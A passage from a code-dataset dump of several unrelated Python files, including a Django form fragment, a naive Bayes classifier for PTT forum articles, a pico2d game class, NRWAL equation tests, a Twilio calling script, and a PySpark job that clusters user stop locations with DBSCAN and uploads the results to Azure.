print(self.fields['porte'])\n        port_list = [(e, e) for e in port_list]\n        # print(port_list)\n        # set the dynamic choices on this instance's field, not on the class-level declared_fields\n        self.fields['porte'].choices = port_list\n    \nclass StructuralFinalizeForm(forms.Form):\n    entity_name = forms.CharField(\n        max_length=50,\n    )\n    architecture_name = forms.CharField(\n        max_length=50\n    )","sub_path":"vhdl/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"246825638","text":"# -*-coding:utf-8-*-\nimport article\nimport jieba\nimport jieba.analyse\nimport json\n\nfrom naiveBayesClassifier.trainedData import TrainedData\nfrom naiveBayesClassifier import tokenizer\nfrom naiveBayesClassifier.trainer import Trainer\nfrom naiveBayesClassifier.classifier import Classifier\n\nclass NaiveBayesClassifier:\n    def __init__(self):\n        jieba.set_dictionary('dict.big.txt')\n        self.articleTrainer = Trainer(tokenizer)\n\n    def train(self):\n        # Training\n        articles = article.create_articles_from_file(\"data/HatePoliticsdata.json\")\n        p_train = articles[0:3001]\n        p_test = articles[3001:3031]\n\n        for a in p_train:\n            doc = a.body\n            #seg_list = jieba.lcut(doc, cut_all=False)\n            seg_list = jieba.analyse.extract_tags(doc)\n            doc = \" \".join(seg_list)\n            self.articleTrainer.train(doc, 'politics')\n\n        articles = article.create_articles_from_file(\"data/Gossipingdata.json\")\n        g_train = articles[0:3000]\n        g_test = articles[3001:3301]\n\n        for a in g_train:\n            doc = a.body\n            #seg_list = jieba.lcut(doc, cut_all=False)\n            seg_list = jieba.analyse.extract_tags(doc)\n            doc = \" \".join(seg_list)\n            self.articleTrainer.train(doc, 'gossiping')\n        f = open('data/docCountOfClasses.json', 'w', -1, 'utf-8')\n        f.write(json.dumps(self.articleTrainer.data.docCountOfClasses))\n        f.close()\n        f = open('data/frequencies.json', 'w', -1, 'utf-8')\n        f.write(json.dumps(self.articleTrainer.data.frequencies))\n        f.close()\n        \n\n    def classify(self, article):\n        self.data = TrainedData()\n        f = open('data/docCountOfClasses.json', 'r', -1, 'utf-8')\n        self.data.docCountOfClasses = json.load(f)\n        f.close()\n        f = open('data/frequencies.json', 'r', -1, 'utf-8')\n        self.data.frequencies = json.load(f)\n        f.close()\n        #Testing\n        self.articleClassifier = Classifier(self.data, tokenizer)\n        doc = article.body\n        #seg_list = jieba.lcut(doc, cut_all=False)\n        seg_list = jieba.analyse.extract_tags(doc)\n        doc = \" \".join(seg_list)\n        classification = self.articleClassifier.classify(doc)\n        return 
classification[0][0]\n","sub_path":"PTTModeratorHelper/NBC.py","file_name":"NBC.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"423171998","text":"from pico2d import *\nimport random\nimport game_framework\nimport game_world\nfrom game_object import GameObject\n\nclass Missile(GameObject):\n # image = None\n RUN_SPEED_PPS = 200\n def __init__(self, x, y, dx, dy, size):\n super(Missile, self).__init__()\n self.x, self.y = x, y\n self.dx, self.dy = dx, dy\n self.size = size\n self.w = 2 * size\n self.h = 2 * size\n self.fps = 8 + random.randint(0, 20)\n self.frame = random.randint(0, 23)\n self.init_image(Missile, 'fireball.png', 24)\n\n # def draw(self):\n # \tself.image.clip_draw(128 * self.frame, 0, 128, 128, self.x, self.y, 2 * self.size, 2 * self.size)\n\n def update(self):\n super(Missile,self).update_frame()\n if game_world.isPaused():\n return\n self.x += Missile.RUN_SPEED_PPS * game_framework.frame_time * self.dx\n self.y += Missile.RUN_SPEED_PPS * game_framework.frame_time * self.dy\n if self.x < -self.size or \\\n self.y < -self.size or \\\n self.x > get_canvas_width() + self.size or \\\n self.y > get_canvas_height() + self.size:\n game_world.remove_object(self)\n\n def isInField(self, width, height):\n if (self.x < 0): return False\n if (self.y < 0): return False\n if (self.x > width): return False\n if (self.y > height): return False\n return True","sub_path":"3-2/2D게임프로그래밍/2dgp-2018-2/pr1120_time/missile.py","file_name":"missile.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"469634232","text":"# -*- coding: utf-8 -*-\n# pylint: disable=E1101\n\"\"\"\nTests for NRWAL equation handler objects\n\"\"\"\nimport os\nimport numpy as np\nimport pytest\n\nfrom NRWAL.handlers.groups import EquationGroup\nfrom NRWAL.handlers.directories import EquationDirectory\n\nTEST_DIR = os.path.dirname(os.path.abspath(__file__))\nTEST_DATA_DIR = os.path.join(TEST_DIR, 'data/')\nMODULE_DIR = os.path.dirname(TEST_DIR)\nEQNS_DIR = os.path.join(MODULE_DIR, 'NRWAL/')\n\nGOOD_DIR = os.path.join(TEST_DATA_DIR, 'test_eqns_dir/')\n\nBAD_DIR = os.path.join(TEST_DATA_DIR, 'bad_eqn_dir/')\nBAD_FILE_TYPE = os.path.join(BAD_DIR, 'bad_file_type.txt')\nBAD_EQN = os.path.join(BAD_DIR, 'bad_list_eqn.yaml')\n\n\ndef test_print_eqn():\n \"\"\"Test the pretty printing and variable name parsing of equation strs\"\"\"\n fp = os.path.join(GOOD_DIR, 'subdir/jacket.yaml')\n obj = EquationGroup(fp)\n\n eqn_name = 'outfitting_8MW'\n known_vars = ('depth', 'outfitting_cost')\n eqn = obj[eqn_name]\n assert len(eqn.variables) == len(known_vars)\n assert all([v in eqn.variables for v in known_vars])\n assert all([v in str(eqn) for v in known_vars])\n assert eqn_name in str(eqn)\n\n eqn_name = 'lattice'\n known_vars = ('turbine_capacity', 'depth', 'lattice_cost')\n eqn = obj[eqn_name]\n assert len(eqn.variables) == len(known_vars)\n assert all([v in eqn.variables for v in known_vars])\n assert all([v in str(eqn) for v in known_vars])\n assert eqn_name in str(eqn)\n\n eqn = obj['subgroup::eqn1']\n assert isinstance(eqn.variables, list)\n assert not eqn.variables\n assert str(eqn) == '100'\n\n fp = os.path.join(GOOD_DIR, 'subdir/')\n obj = EquationDirectory(fp)\n eqn = obj['jacket::lattice']\n assert 'lattice_cost=100.0' in str(eqn)\n assert 'turbine_capacity, ' in str(eqn)\n assert 'depth, ' in str(eqn)\n\n\ndef test_eqn_eval():\n 
\"\"\"Test some simple evaluations and kwargs passing\"\"\"\n\n fp = os.path.join(GOOD_DIR, 'subdir/jacket.yaml')\n obj = EquationGroup(fp)\n\n assert obj['subgroup::eqn1'].evaluate() == 100\n\n eqn = obj['outfitting_8MW']\n kwargs = {k: 1 for k in eqn.variables}\n assert eqn.evaluate(**kwargs) == 55.2\n\n eqn = obj['lattice']\n kwargs = {k: 1 for k in eqn.variables}\n assert eqn.evaluate(**kwargs) == 41.07337083665887\n\n eqn = obj['lattice']\n kwargs = {k: np.ones((10, 10)) for k in eqn.variables}\n truth = 41.07337083665887 * np.ones((10, 10))\n assert np.allclose(eqn.evaluate(**kwargs), truth)\n\n with pytest.raises(RuntimeError):\n eqn.evaluate()\n\n\n@pytest.mark.parametrize('operator', ('+', '-', '*', '**', '/'))\ndef test_eqn_math(operator):\n \"\"\"Test the Equation object dunder math methods such as __add__ \"\"\"\n obj = EquationDirectory(GOOD_DIR)\n eqn1 = obj['jacket::lattice']\n eqn2 = obj['jacket::transition_piece']\n\n if operator == '+':\n eqn3 = eqn1 + eqn2\n eqn4 = eqn1 + 3\n elif operator == '-':\n eqn3 = eqn1 - eqn2\n eqn4 = eqn1 - 3\n elif operator == '*':\n eqn3 = eqn1 * eqn2\n eqn4 = eqn1 * 3\n elif operator == '**':\n eqn3 = eqn1 ** eqn2\n eqn4 = eqn1 ** 3\n elif operator == '/':\n eqn3 = eqn1 / eqn2\n eqn4 = eqn1 / 3\n\n assert str(eqn1) in str(eqn3)\n assert str(eqn2) in str(eqn3)\n assert eqn1.full in eqn3.full\n assert eqn2.full in eqn3.full\n assert str(eqn1) in str(eqn4)\n assert eqn1.full in eqn4.full\n assert '{} (3)'.format(operator) in eqn4.full\n\n args1 = {k: 2 for k in eqn1.variables}\n args2 = {k: 2 for k in eqn2.variables}\n args3 = {k: 2 for k in eqn3.variables}\n assert set(eqn1.variables + eqn2.variables) == set(eqn3.variables)\n assert eqn1.variables == eqn4.variables\n\n assert_eqn_eval_math(eqn1, eqn2, eqn3, eqn4, args1, args2, args3, operator)\n\n\ndef assert_eqn_eval_math(eqn1, eqn2, eqn3, eqn4, args1, args2, args3,\n operator):\n \"\"\"Run assert statements on Equation objects that have been combined using\n arithmetic operators\"\"\"\n if operator == '+':\n assert eqn1.eval(**args1) + eqn2.eval(**args2) == eqn3.eval(**args3)\n assert eqn1.eval(**args1) + 3 == eqn4.eval(**args1)\n elif operator == '-':\n assert eqn1.eval(**args1) - eqn2.eval(**args2) == eqn3.eval(**args3)\n assert eqn1.eval(**args1) - 3 == eqn4.eval(**args1)\n elif operator == '*':\n assert eqn1.eval(**args1) * eqn2.eval(**args2) == eqn3.eval(**args3)\n assert eqn1.eval(**args1) * 3 == eqn4.eval(**args1)\n elif operator == '**':\n assert eqn1.eval(**args1) ** eqn2.eval(**args2) == eqn3.eval(**args3)\n assert eqn1.eval(**args1) ** 3 == eqn4.eval(**args1)\n elif operator == '/':\n assert eqn1.eval(**args1) / eqn2.eval(**args2) == eqn3.eval(**args3)\n assert eqn1.eval(**args1) / 3 == eqn4.eval(**args1)\n","sub_path":"tests/test_handlers_equations.py","file_name":"test_handlers_equations.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"484631631","text":"from twilio.rest import Client\n\nclient = Client(TWILIO_ACCOUNT_SID, TWILIO_AUTH_TOKEN) # use your personal TWILIO_ACCOUNT_SID and TWILIO_AUTH_TOKEN as the values for the env variables.\n\ncall_receipients = ('+1-123-123-1234', '+1-123-123-1235', '+1-123-123-1236') # an array containing the phone numbers that will be called. \n\ndef create_phone_call():\n for receipient in call_receipients:\n \"\"\" creates voice calls to phone numbers in call_receipients. \n Use your personal TWILIO_PHONE_NUMBER as an env variable. 
\"\"\"\n call = client.calls.create(\n url='http://demo.twilio.com/docs/voice.xml',\n to=receipient,\n from_=TWILIO_PHONE_NUMBER\n )\n\n ","sub_path":"twilio_calls_src/calls/create_call.py","file_name":"create_call.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"631434756","text":"from __future__ import print_function\nfrom sklearn.cluster import DBSCAN\n\nimport argparse\nimport hashlib\nimport os\nimport time\n\nfrom datetime import date, datetime, timedelta\nfrom functools import reduce\nfrom math import degrees\n\nfrom concurrent.futures import ThreadPoolExecutor\nimport concurrent.futures\n\nfrom azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient, BlobBlock\nfrom azure.core.exceptions import ResourceNotFoundError\n\nfrom pyspark import SparkContext, SparkConf, SQLContext\nfrom pyspark.sql import DataFrame, SparkSession\nimport pyspark.sql.functions as F\nfrom pyspark.sql.functions import col, udf\nfrom pyspark.sql.types import *\nfrom pyspark.sql.window import Window\nfrom pyspark import StorageLevel\nfrom pyspark.sql.functions import lag, pandas_udf, PandasUDFType\n\n# import logging\n\nVERSION = 5\n\n#\n# Driver settings\n#\nSHUFFLE_PARTITIONS = 32\nOUT_PARTITIONS = 2\nCORES = \"4\"\nRAM = \"12g\"\nAPP_NAME = \"StopUserClusters\"\n\n# always set overwrite\nWRITE_MODE = \"overwrite\"\nSKIP_EXISTING = False\nTHREADS = 32\n\n\n# templates\nTABLE_PATH = \"wasbs://{}@{}.blob.core.windows.net/{}/\"\nCONN_STRING = \"BlobEndpoint=https://{}.blob.core.windows.net/;SharedAccessSignature={}\"\n\n# need leading slash\nLOCAL_PATH = \"./table/\"\n\n\n#\n# Stop locations parameters\n#\nEVENTS_ROAM_DIST = 70 # meters\nSTOPS_ROAM_DIST = 65\nEARTH_RADIUS = 6372.795 * 1000\n\nUS_STATES = ['AK', 'AL', 'AR', 'AZ', 'CA', 'CO', 'CT', 'DC', 'DE', 'FL', 'GA', 'HI', 'IA', 'ID', 'IL', 'IN', 'KS', 'KY', 'LA', 'MA', 'MD', 'ME', 'MI', 'MN', 'MO', 'MS',\n 'MT', 'NC', 'ND', 'NE', 'NH', 'NJ', 'NM', 'NV', 'NY', 'OH', 'OK', 'OR', 'PA', 'PR', 'RI', 'SC', 'SD', 'TN', 'TX', 'UT', 'VA', 'VI', 'VT', 'WA', 'WI', 'WV', 'WY']\n\n\ndef read_multiple_df(spark, paths, format=\"parquet\"):\n dfs = None\n dfs_array = []\n for path in paths:\n dfs_load = spark.read.format(format).load(path)\n dfs_array.append(dfs_load)\n dfs = reduce(DataFrame.unionAll, dfs_array)\n return dfs\n\n\n#\n# Stop location lib\n#\n\n\ndef add_distance_column(dfs, order_column='timestamp'):\n # Radians lat/lon\n dfs = dfs.withColumn('latitude2', F.radians('latitude')).withColumn(\n 'longitude2', F.radians('longitude'))\n\n # Groups GPS locations into chucks. 
A chunk is formed by groups of points that are distant no more than roam_dist\n w = Window.partitionBy(['userID']).orderBy(order_column)\n dfs = dfs.withColumn('next_lat', F.lead('latitude2', 1).over(w))\n dfs = dfs.withColumn('next_lon', F.lead('longitude2', 1).over(w))\n\n # Haversine distance\n dfs = dfs.withColumn('distance_next', EARTH_RADIUS * 2 * F.asin(F.sqrt(\n F.pow(F.sin((col('next_lat') - col('latitude2')) / 2.0), 2) + F.cos('latitude2') * F.cos('next_lat') * F.pow(\n F.sin((col('next_lon') - col('longitude2')) / 2.0), 2))))\n dfs = dfs.withColumn('distance_prev', F.lag('distance_next', default=0).over(w)).drop(\n 'latitude2').drop('longitude2').drop('next_lon').drop('next_lat').drop('distance_next')\n return dfs\n\n\ndef get_destinations(dfs, roam_dist=110, earth_radius=6372.795 * 1000):\n \"\"\"\n Applies DBSCAN to extract the unique stop locations from a pyspark DataFrame\n\n :param x: DataFrame with ['id_client', 'latitude', 'longitude', \"from\", \"to\"]. Coordinates are in degrees.\n :param roam_dist: The stop location size in meters.\n :param earth_radius: The radius of the earth.\n :param group_results: If True, it groups by the cluster's location and id_client.\n :return: (pyspark DataFrame) If group_results=True: ['id_client', 'clatitude', 'clongitude', 'time_spent', 'frequency']\n (pyspark DataFrame) If group_results=False: ['id_client', 'latitude', 'longitude', 'clatitude', 'clongitude', 'from', 'to']\n \"\"\"\n\n @pandas_udf(\"userId string, state string, latitude double, longitude double, begin timestamp, end timestamp, clusterId integer\", PandasUDFType.GROUPED_MAP)\n def get_destinations(df):\n \"\"\"\n Applies DBSCAN to stop locations\n\n :param x: 2D numpy array with latitude and longitude.\n :param from_to_array: 2D numpy array with from and to timestamps.\n :param roam_dist: The stop location size in meters.\n :param earth_radius: The radius of the earth.\n :return: (pandas DataFrame) ['latitude', 'longitude', 'clatitude', 'clongitude', 'from', 'to', 'time_spent']\n \"\"\"\n db = DBSCAN(eps=roam_dist/earth_radius, min_samples=1,\n algorithm='ball_tree', metric='haversine')\n df[\"clusterId\"] = db.fit_predict(df[['latitude', 'longitude']])\n\n return df\n\n dfs = dfs.withColumn('latitude', F.radians('latitude'))\n dfs = dfs.withColumn('longitude', F.radians('longitude'))\n\n stops_dfs = dfs.groupby('userId', 'state').apply(get_destinations)\n\n stops_dfs = stops_dfs.withColumn('latitude', F.degrees('latitude'))\n stops_dfs = stops_dfs.withColumn('longitude', F.degrees('longitude'))\n\n w = Window().partitionBy('userId', 'clusterId')\n\n stops_dfs = stops_dfs.withColumn(\n 'clusterLatitude', F.mean('latitude').over(w))\n stops_dfs = stops_dfs.withColumn(\n 'clusterLongitude', F.mean('longitude').over(w))\n\n stops_dfs = stops_dfs.drop('latitude').drop('longitude')\n\n return stops_dfs\n\n#\n# Spark\n#\n\n\ndef getSparkConfig(cores, ram, partitions, azure_accounts, azure_oauth):\n # Setting enviroment variables and various drivers\n # \"org.apache.hadoop:hadoop-azure:2.10.0\" driver Azure\n # \"io.delta:delta-core_2.12:0.7.0\" driver Delta-lake\n # \"spark.sql.extensions=io.delta.sql.DeltaSparkSessionExtension\" configuration Delta\n # \"spark.sql.catalog.spark_catalog=org.apache.spark.sql.delta.catalog.DeltaCatalog\" configuration Delta\n # \"spark.delta.logStore.class=org.apache.spark.sql.delta.storage.AzureLogStore\" configuration Delta\n\n # Set spark environments\n os.environ['PYSPARK_PYTHON'] = '/usr/bin/python3'\n os.environ['PYSPARK_DRIVER_PYTHON'] = 
'/usr/bin/python3'\n # os.environ[\"PYSPARK_SUBMIT_ARGS\"] = \"\"\"--packages \"org.apache.hadoop:hadoop-azure:3.2.1\" pyspark-shell\"\"\"\n os.environ[\"PYSPARK_SUBMIT_ARGS\"] = \"\"\"--packages \"org.apache.hadoop:hadoop-azure:2.10.0\" --jars \"/mnt/batch/tasks/shared/sco-mobilitycovid-udf_2.11-1.0.jar\",\"/mnt/batch/tasks/shared/geo-0.7.7.jar\" pyspark-shell\"\"\"\n conf = (\n SparkConf()\n\n # SQL\n .set(\"spark.sql.shuffle.partitions\", partitions)\n .set(\"spark.sql.csv.filterPushdown.enabled\", \"false\")\n\n # Driver + memory\n .set(\"spark.driver.cores\", cores)\n .set(\"spark.shuffle.file.buffer\", \"1m\")\n # .set(\"spark.memory.offHeap.enabled\",\"true\")\n # .set(\"spark.memory.offHeap.size\",\"3g\")\n .set(\"spark.memory.fraction\", \"0.8\")\n .set(\"spark.memory.storageFraction\", \"0.2\")\n .set(\"spark.io.compression.lz4.blockSize\", \"128k\")\n .set(\"spark.driver.maxResultSize\", \"0\")\n .set(\"spark.driver.memory\", ram)\n\n # Local storage for spilling & storing temp files\n .set(\"spark.local.dir\", \"/mnt/batch/tasks/shared\")\n\n # Set master local\n .setMaster(\"local[*]\")\n\n # App name\n .setAppName(APP_NAME)\n )\n\n # Azure (Keys, Filesystem WASBS)\n conf.set(\"spark.hadoop.fs.wasbs.impl\",\n \"org.apache.hadoop.fs.azure.NativeAzureFileSystem\")\n\n for account in azure_accounts:\n conf.set(\"fs.azure.sas.{}.{}.blob.core.windows.net\".format(account['container'], account['storage']),\n account['sas'])\n\n if azure_oauth:\n conf.set(\"spark.hadoop.fs.azure.account.auth.type\", \"OAuth\")\n conf.set(\"spark.hadoop.fs.azure.account.oauth.provider.type\",\n \"org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider\")\n conf.set(\"spark.hadoop.fs.azure.account.oauth2.client.id\",\n azure_oauth['client-id'])\n conf.set(\"spark.hadoop.fs.azure.account.oauth2.client.secret\",\n azure_oauth['client-secret'])\n conf.set(\"spark.hadoop.fs.azure.account.oauth2.client.endpoint\",\n azure_oauth['endpoint'])\n return conf\n\n#\n# Utils\n#\n\n\ndef enumerate_prefixes(start=0, end=256):\n for i in range(start, end):\n yield '{:02x}'.format(i)\n\n\ndef upload_blob(blob_service_client, container_out, blob_key, file_path):\n blob_client = blob_service_client.get_blob_client(\n container_out, blob_key)\n\n with open(file_path, \"rb\") as data:\n blob_client.upload_blob(data, overwrite=True)\n\n # cleanup\n os.remove(file_path)\n\n return blob_key\n\n#\n# Argparser\n#\n\n\ndef get_args():\n \"\"\"Parse command line arguments.\"\"\"\n\n parser = argparse.ArgumentParser(description=\"Cuebiq data processor\")\n requiredNamed = parser.add_argument_group('required arguments')\n requiredNamed.add_argument(\n \"--storage\", type=str, required=True, help=\"Azure storage\")\n requiredNamed.add_argument(\n \"--sas\", type=str, required=True, help=\"SAS token\")\n requiredNamed.add_argument(\n \"--oauth-login\", type=str, required=True, help=\"Oauth login\")\n requiredNamed.add_argument(\n \"--oauth-client-id\", type=str, required=True, help=\"Oauth client id\")\n requiredNamed.add_argument(\n \"--oauth-client-secret\", type=str, required=True, help=\"Oauth client secret\")\n requiredNamed.add_argument(\n \"--container-in\", type=str, required=True, help=\"Input container\")\n requiredNamed.add_argument(\n \"--container-out\", type=str, required=True, help=\"Output container\")\n requiredNamed.add_argument(\"--country\", type=str,\n help=\"Country. 
Options: 'US','IT'\")\n requiredNamed.add_argument(\"--prefix\", type=str, help=\"User prefix\")\n\n # optional\n parser.add_argument(\"--vm-cores\", default=CORES,\n type=str, help=\"Azure VM cores\")\n parser.add_argument(\"--vm-ram\", default=RAM,\n type=str, help=\"Azure VM ram\")\n parser.add_argument(\"--shuffle-partitions\", default=SHUFFLE_PARTITIONS,\n type=int, help=\"Spark shuffle partitions\")\n parser.add_argument(\"--roam-dist-stops\", type=int,\n default=STOPS_ROAM_DIST, help=\"Roam dist stops\")\n parser.add_argument(\"--roam-dist-events\", type=int,\n default=EVENTS_ROAM_DIST, help=\"Roam dist events\")\n parsed_args = parser.parse_args()\n\n return parsed_args\n\n\n#\n# Main function\n#\ndef main():\n \"\"\"Main function\"\"\"\n\n # Get args\n args = get_args()\n\n # container\n container_in = args.container_in\n container_out = args.container_out\n\n # Azure credentials\n sas_token = args.sas\n storage_account_name = args.storage\n azure_accounts = list()\n azure_accounts.append({\n \"storage\": storage_account_name,\n \"sas\": sas_token,\n \"container\": container_in\n })\n azure_accounts.append({\n \"storage\": storage_account_name,\n \"sas\": sas_token,\n \"container\": container_out\n })\n\n oauth_login = args.oauth_login\n oauth_client_id = args.oauth_client_id\n oauth_client_secret = args.oauth_client_secret\n\n # requires hadoop 3.2+\n # azure_oauth = {\n # \"endpoint\": oauth_login,\n # \"client-id\": oauth_client_id,\n # \"client-secret\": oauth_client_secret\n # }\n azure_oauth = False\n\n # VM\n cores = args.vm_cores\n ram = args.vm_ram\n shuffle_partitions = args.shuffle_partitions\n\n # Date, prefix\n country = args.country\n prefix = args.prefix\n\n # process config\n roam_dist_stops = args.roam_dist_stops\n roam_dist_events = args.roam_dist_events\n\n # Path in - path out\n blob_in = f\"wasbs://{container_in}@{storage_account_name}.blob.core.windows.net/stoplocation-v8_prefix_r70-s5-a70-h6/{country}/\"\n timezones_in = f\"wasbs://cuebiq-data@{storage_account_name}.blob.core.windows.net/utils_states_timezones/\"\n if azure_oauth:\n # we can leverage abfss\n blob_in = f\"abfss://{container_in}@{storage_account_name}.dfs.core.windows.net/stoplocation-v8_prefix_r70-s5-a70-h6/country={country}/\"\n timezones_in = f\"abfss://cuebiq-data@{storage_account_name}.dfs.core.windows.net/utils_states_timezones/\"\n\n path_out_distinct = f\"distinct_user_clusters-v8_r70-s5-a70-h6_clustered_{roam_dist_stops}m_v{VERSION}/country={country}\"\n path_out_all = f\"all_user_clusters-v8_r70-s5-a70-h6_clustered_{roam_dist_stops}m_v{VERSION}/country={country}\"\n\n # config spark\n conf = getSparkConfig(cores, ram, shuffle_partitions,\n azure_accounts, azure_oauth)\n\n # set prop for handling partition columns as strings (fixes prefixes as int)\n conf.set(\"spark.sql.sources.partitionColumnTypeInference.enabled\", \"false\")\n\n # Create spark session\n sc = SparkContext(conf=conf).getOrCreate()\n sqlContext = SQLContext(sc)\n spark = sqlContext.sparkSession\n # register UDF from jar\n spark.udf.registerJavaFunction(\n \"geohash\", \"it.smartcommunitylab.sco.mobilitycovid.udf.GeohashEncode\")\n\n # Init azure client\n blob_service_client = BlobServiceClient.from_connection_string(\n CONN_STRING.format(storage_account_name, sas_token))\n\n # build keys, date is mandatory, prefix opt\n partition_key = f\"prefix={prefix}\"\n\n print(\"process \"+partition_key)\n start_time = time.time()\n local_dir = LOCAL_PATH+partition_key\n print(\"write temp to \"+local_dir)\n\n # cleanup local 
if exists\n if (os.path.isdir(local_dir)):\n map(os.unlink, (os.path.join(local_dir, f)\n for f in os.listdir(local_dir)))\n\n # Input dataset\n print(\"read dataset table\")\n read_time = time.time()\n\n # explode days manually\n dates = [\n datetime(2020, 1, 1) + timedelta(days=x) for x in range(0, 258)]\n blobs_in = [\"{}/year={}/month={}/day={}/prefix={}\".format(\n blob_in, d.year, d.month, d.day, prefix) for d in dates]\n\n #dfs = spark.read.format(\"parquet\").load(*blobs_in)\n dfs = read_multiple_df(spark, blobs_in)\n dfs_timezones = spark.read.format(\"parquet\").load(timezones_in)\n\n # manually inject prefix column\n dfs = dfs.withColumn(\"prefix\", F.lit(prefix))\n\n # apply partition filter\n dfs_state = dfs.where(f\"prefix = '{prefix}'\")\n\n print(\"processing with spark\")\n spark_time = time.time()\n\n w = Window().partitionBy('userId').orderBy('begin')\n\n dfs_state = add_distance_column(dfs_state, order_column='begin')\n dfs_state = dfs_state.fillna(0, subset=['next_travelled_distance'])\n dfs_state = dfs_state.withColumn('lag_next_travelled_distance', F.lag(\n col('next_travelled_distance')).over(w))\n dfs_state = dfs_state.withColumn('lag_end', F.lag('end').over(w))\n dfs_state = dfs_state.withColumn('rn', F.when(((col('lag_next_travelled_distance') != col('prev_travelled_distance')) |\n (col('prev_travelled_distance') > 0) |\n (col('lag_next_travelled_distance') > 0) |\n (col('distance_prev') > roam_dist_events) |\n ((F.dayofyear(col('begin')) - F.dayofyear(col('lag_end')) == 1) &\n (F.hour(col('begin')) < 6))\n ) &\n ((col('lag_end').isNull()) | (col('lag_end') < col('begin'))), 1).otherwise(0))\n # Remove prev_travelled distance when rn == 0 (it happens when lag_end and begin overlap)\n dfs_state = dfs_state.withColumn('prev_travelled_distance', F.when(\n col('rn') == 0, 0).otherwise(col('prev_travelled_distance')))\n\n w = Window().partitionBy('userId').orderBy(\n 'begin').rangeBetween(Window.unboundedPreceding, 0)\n\n dfs_state = dfs_state.withColumn('group', F.sum('rn').over(w))\n\n dfs_state = dfs_state.groupBy('userId', 'group', 'state').agg(F.mean('latitude').alias('latitude'),\n F.mean('longitude').alias(\n 'longitude'),\n F.min('begin').alias(\n 'begin'),\n F.max('end').alias('end')).drop('group')\n\n dfs_destinations = get_destinations(dfs_state, roam_dist=roam_dist_stops)\n dfs_destinations = dfs_destinations.withColumn(\n 'prefix', dfs_destinations.userId.substr(1, 2))\n dfs_destinations = dfs_destinations.withColumn(\n 'dayofyear', F.dayofyear('begin'))\n dfs_destinations = dfs_destinations.withColumn('year', F.year('begin'))\n # dfs_destinations = dfs_destinations.withColumn('state', F.lit(state))\n\n # Local time\n dfs_destinations.createOrReplaceTempView(\"dfs_destinations\")\n dfs_destinations = spark.sql(\"\"\"\n SELECT dfs_destinations.*, geohash(clusterLatitude, clusterLongitude, 7) as geohash7\n from dfs_destinations\n \"\"\")\n dfs_destinations = dfs_destinations.withColumn(\n 'geohash5', F.substring(col('geohash7'), 1, 5))\n dfs_destinations = dfs_destinations.join(\n F.broadcast(dfs_timezones), on='geohash5').drop('geohash5')\n dfs_destinations = dfs_destinations.withColumn(\n 'local_begin', F.from_utc_timestamp(col('begin'), col('tzid')))\n dfs_destinations = dfs_destinations.withColumn('offset', (\n (col('local_begin').cast('long') - col('begin').cast('long')) / 3600).cast('int')).drop('local_begin')\n dfs_destinations.persist(StorageLevel.DISK_ONLY)\n\n # Write\n # output as country/prefix/part1..N\n local_dir_all = local_dir + \"/all/\"\n 
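# the \"all\" output keeps one row per user stop visit and is written locally under <local_dir>/all/prefix=<prefix>/, repartitioned by dayofyear before the upload step below\n    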
dfs_destinations_all = dfs_destinations.select(\n 'prefix', 'userId', 'clusterId', 'begin', 'end', 'offset', 'year', 'dayofyear')\n dfs_destinations_all.repartition(8, 'dayofyear').write.format('parquet').mode(\n 'overwrite').save(local_dir_all+\"prefix=\"+prefix+\"/\")\n\n # output as country/prefix/state\n local_dir_distinct = local_dir+\"/distinct/\"\n dfs_destinations_distinct = dfs_destinations.select(\n 'prefix', 'userId', 'clusterId', 'clusterLatitude', 'clusterLongitude', 'geohash7', 'state').distinct()\n dfs_destinations_distinct.repartition(\"state\").write.partitionBy(\n \"state\").format('parquet').mode('overwrite').save(local_dir_distinct+\"prefix=\"+prefix+\"/\")\n\n dfs_destinations.unpersist()\n\n print(\"upload local data to azure\")\n upload_time = time.time()\n\n # upload parts 1 \"prefix/state\"\n print(f\"upload files for distinct\")\n # upload with threads\n dfutures = []\n with ThreadPoolExecutor(max_workers=THREADS) as executor:\n fprefix = prefix\n print(f\"upload files for distinct: {fprefix}\")\n prefix_dir = local_dir_distinct+\"prefix=\"+fprefix\n prefix_key = f\"prefix={fprefix}\"\n\n for state in US_STATES:\n s_key = f\"state={state}\"\n f_dir = prefix_dir + \"/\"+s_key\n f_key = prefix_key + \"/\"+s_key\n\n # print(f\"read files for distinct from {f_dir}\")\n\n if (os.path.isdir(f_dir)):\n files = [filename for filename in os.listdir(\n f_dir) if filename.startswith(\"part-\")]\n\n if len(files) > 0:\n\n for file_local in files:\n file_path = f_dir+\"/\"+file_local\n part_num = int(file_local.split('-')[1])\n part_key = '{:05d}'.format(part_num)\n # fix name as static hash to be reproducible\n filename_hash = hashlib.sha1(\n str.encode(f_key+f_key+part_key)).hexdigest()\n\n blob_key = \"{}/{}/part-{}-{}.snappy.parquet\".format(\n path_out_distinct, f_key, part_key, filename_hash)\n\n # print(\"upload \" + file_path + \" to \" + container_out+\":\"+blob_key)\n # upload_blob(blob_service_client,container_out, blob_key, file_path)\n future = executor.submit(\n upload_blob, blob_service_client, container_out, blob_key, file_path)\n dfutures.append(future)\n\n # else:\n # print(f\"no files to upload for {f_key}\")\n\n # else:\n # print(f\"missing partition for {f_key}\")\n\n # end of loop, wait for futures\n for future in dfutures:\n bkey = future.result()\n\n # ensure we wait all tasks\n # TODO check if all done\n ddone = concurrent.futures.wait(dfutures)\n\n # upload parts 2 \"prefix/parts\"\n print(f\"upload files for all\")\n fprefix = prefix\n # upload with threads\n afutures = []\n with ThreadPoolExecutor(max_workers=THREADS) as executor:\n print(f\"upload files for all: {fprefix}\")\n prefix_dir = local_dir_all+\"prefix=\"+fprefix\n prefix_key = f\"prefix={fprefix}\"\n\n if (os.path.isdir(prefix_dir)):\n files = [filename for filename in os.listdir(\n prefix_dir) if filename.startswith(\"part-\")]\n\n if len(files) > 0:\n\n for file_local in 